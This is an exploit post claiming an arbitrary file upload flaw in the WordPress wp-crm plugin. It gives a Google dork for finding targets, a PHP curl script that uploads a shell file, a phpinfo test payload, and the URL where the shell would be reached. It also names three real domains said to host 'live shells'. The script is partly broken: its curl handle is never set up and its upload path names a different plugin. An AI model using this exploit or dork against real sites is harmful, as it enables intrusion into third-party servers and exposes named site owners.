#############################################################################################
#
# Title : WordPress wp-crm Plugin Arbitrary File Upload Vulnerability #
#
# Author : X-Bruno #
#
#
Date
: 27/06/2014 #
#
# Facebook : http:
//www.facebook.com/Inj3ct.Bruno #
#
#
# Email: brunox338@gmail.com #
#
#
# Vendor : www.wordpress.org #
#
#
#Googe Dork : inurl:/wp-content/plugins/wp-crm/ #
#
#
# Tested on : Linux #
#
#############################################################################################
Exploit : upload shell/.php
<?php
$uploadfile
=
"Bruno.php"
;
curl_setopt(
$ch
, CURLOPT_POST, true);
curl_setopt(
$ch
, CURLOPT_POSTFIELDS,
array
(
'Filedata'
=>
"@$uploadfile"
,
'folder'
=>
"/wordpress/wp-content/plugins/wp-property/third-party/uploadify/"
));
curl_setopt(
$ch
, CURLOPT_RETURNTRANSFER, 1);
$postResult
= curl_exec(
$ch
);
curl_close(
$ch
);
print
"$postResult"
;
?>
-------------------------------
<?php
phpinfo();
?>
-------------------------------
Shell Access ==== > http:
//localhost/wordpress/wp-content/plugins/wp-crm/third-party/uploadify/(shell_name.php)
--------------------------------
Examples : (Live Shells)
1- http:
//www.transport9.com/wp-content/plugins/wp-crm/third-party/uploadify/fuck.php
2- http:
//adbuzzler.com/wp-content/plugins/wp-crm/third-party/uploadify/fuck.php
3- http:
//ourladyofthecape.com/wp-content/plugins/wp-crm/third-party/uploadify/fuck.php
#####################################################################
# Greeting : Toomy Jone , Injector Hacker , Dr.SHA6H , HunTerS - Team #
#####################################################################